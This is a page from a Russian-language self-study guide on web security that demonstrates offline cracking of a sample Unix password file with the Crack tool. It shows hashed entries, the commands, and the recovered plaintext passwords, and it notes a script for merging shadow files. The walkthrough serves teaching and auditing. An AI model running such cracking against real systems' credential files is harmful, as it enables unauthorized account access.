Иллюстрированный самоучитель по Secure Web


Локальный доступ - часть 4


root:cwIBREDaWLHmo:0:0:root:/root:/bin/bash

bin:*:l:l:bin:/bin:

daemon:*:2:2:daemon:/sbin:

<other locked accounts omitted>

nobody:*:9 9:9 9:Nobody:/:

eric:GmTFgOAavFAOU:500:0:
:/home/eric:/bin/csh

samantha:XaDeasK8g8g3s:501:503:
:/home/samantha:/bin/bash

temp:kRWegG5iTZP5o:502:506:
:/home/temp:/bin/bash

hackme:nh.StBNcQnyE2:504:1:
:/home/hackme:/bin/bash

bob:9wynbWzXinBQ6:506:1::/home/bob:/bin/csh

es:OxOH89TiymLcc:501:501::/home/es:/bin/bash

mother:jxZdltcz3wW2Q:505:505:
:/home/mother:/bin/bash

jfr:kyzKROryhFDE2:506:506:
:/home/jfr:/bin/bash

Для того чтобы запустить программу Crack для взлома данного файла, необходимо воспользоваться следующей командой.

[tsunamitt Crack passwd

Crack 5.0a: The Password Cracker.

(c) Alec Muffett, 1991, 1992, 1993, 1994, 1995, 1996

System: Linux 2.0.36
#1 Tue Oct 13 22:17:11 EOT 1998 1686 unknown

<omitted for brevity>

Crack: The dictionaries seem up to date...

Crack: Sorting out and merging feedback, please be patient...

Crack: Merging password files...

Crack: Creating gecos-derived dictionaries

mkgecosd: making non-permuted words dictionary

mkgecosd: making permuted words dictionary

Crack: launching: cracker -kill run/system.11324

Done

Начиная с этого момента программа Crack переходит к функционированию в фоновом режиме с сохранением результатов в базе данных. Для того чтобы обратиться к этой базе данных и узнать, какие пароли были взломаны, необходимо запустить утилиту Reporter.

[tsunami]# Reporter -quiet

---passwords cracked as of Sat 13:09:50 EOT ---

Guessed eric [jenny] [passwd /bin/csh]

Guessed hackme [hackme] [passwd /bin/bash]

Guessed temp [temp] [passwd /bin/bash]

Guessed es [eses] [passwd /bin/bash]

Guessed jfr [solarisl] [passwd /bin/bash]

Если вы хотите увидеть только пароли, взломанные к текущему моменту, необходимо запустить профамму Reporter с параметром -quiet. При запуске утилиты без параметров на экран выводятся сведения об ошибках, предупреждения, а также сведения о заблокированных паролях. В комплект поставки профаммы Crack входит еще и несколько очень полезных сценариев. Один из них — shadmrg. sv. Он предназначен для объединения файла паролей UNIX со скрытым файлом паролей, что позволяет получить один исходный файл, содержащий всю информацию, необходимую для взлома паролей. Еще одной интересной командой является команда make tidy, с помощью которой можно удалить остаточные учетные пользовательские записи и пароли после выполнения Crack.



Начало  Назад  Вперед



Книжный магазин